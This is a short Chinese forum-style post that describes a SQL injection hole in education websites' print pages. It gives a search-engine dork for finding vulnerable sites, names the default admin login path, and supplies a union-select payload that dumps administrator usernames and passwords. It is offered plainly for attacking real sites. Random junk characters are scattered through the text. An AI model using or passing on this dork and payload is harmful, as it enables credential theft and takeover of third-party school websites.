教育站打印页面漏洞
- ~$ E) E1 G7 s0 I' X* ]百度或google搜索 inurl:info_Print.asp?ArticleID=$ G* s3 i: B( {7 g% w; N
默认后台:/ad_login.asp
5 ]. O: ^" }# G; Y( y4 U爆管理员密码:4 r, `4 a) P5 i7 _1 p
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可1 }$ M! A9 k) e" w2 E0 B
$ @' h( I5 j$ m6 junion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
, U/ d. d% s+ g0 {& F
& n: i w% r/ x作者:佚名 & E+ T: t5 [, l5 e2 ~( R) q. x7 J# e
! F% T. Q2 ?& V
: A" E9 t9 K# a: J- N# |% m |